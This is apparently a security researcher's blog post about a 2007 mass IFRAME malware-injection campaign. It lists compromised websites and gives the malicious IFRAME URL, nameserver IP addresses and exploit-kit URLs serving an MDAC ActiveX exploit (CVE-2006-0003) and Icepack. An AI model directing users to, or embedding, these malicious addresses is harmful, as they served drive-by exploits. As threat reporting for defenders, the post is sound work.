Another Massive Embedded Malware Attack

Compared to the previous massive malware embedded attack in Italy that I asessed in June, 2007 which was primarily relying on the fact that a shared hosting provider got hacked into, this one is more interesting to follow because the domains have nothing to do with each other, in fact some are suspected of being generated for blackhat SEO purposes in combination with embedded malware. The rest are legitimate sites. Moreover, the campaign is currently in a cover up stage, but the sites are still serving the IFRAME you can see in the attached screenshot. Currently affected sites where over 90% still have the IFRAME within :

syncopatedvideo.com

ja-bob.com

idledrawings.com

biblequizzer.net

johnnydam.com

gonaus.com

caribbeanjamz.net

campbellscollision.com

instopiainsurance.com

electronicesthetics.com

blackopalproductions.com

loadway.com

mtwashingtonkennelclub.com

shoveltown.com

simplabase.com

ajrivers.com

jacquelinesdayspa.com

epidemianet.com

aabosa.net

bisign.com

orangevaleson.com

blackmanassociates.com

jumarktrade.com

queerduck.icebox.com

The main campaign IFRAME URL is megazo.org/trans.htm serving TR/Crypt.XPACK.Gen and using its own nameservers ns1.megazo.org (203.117.111.102) and ns2.megazo.org (203.117.111.103) which is also hosting 13fr.info; 1sense.info; 1speed.info. Deobfuscation leads to 1spice.info/t/ (203.121.79.164) where we're redirected to 203.121.79.164/cgi-bin/new/in.cgi?p=user4, both URLs try to exploit MDAC ActiveX code execution (CVE-2006-0003) vulnerability. Another exploit URL is also active at this IP - 203.121.79.164/web/index.php which is Icepack is action.

Related posts:

Bank of India Serving Malware

U.S Consulate in St.Petersburg Serving Malware

Syrian Embassy in London Serving Malware

CISRT Serving Malware

Compromised Sites Serving Malware and Spam

A Portfolio of Malware Embedded Magazines

Possibility Media's Malware Fiasco

I See Alive IFRAMEs Everywhere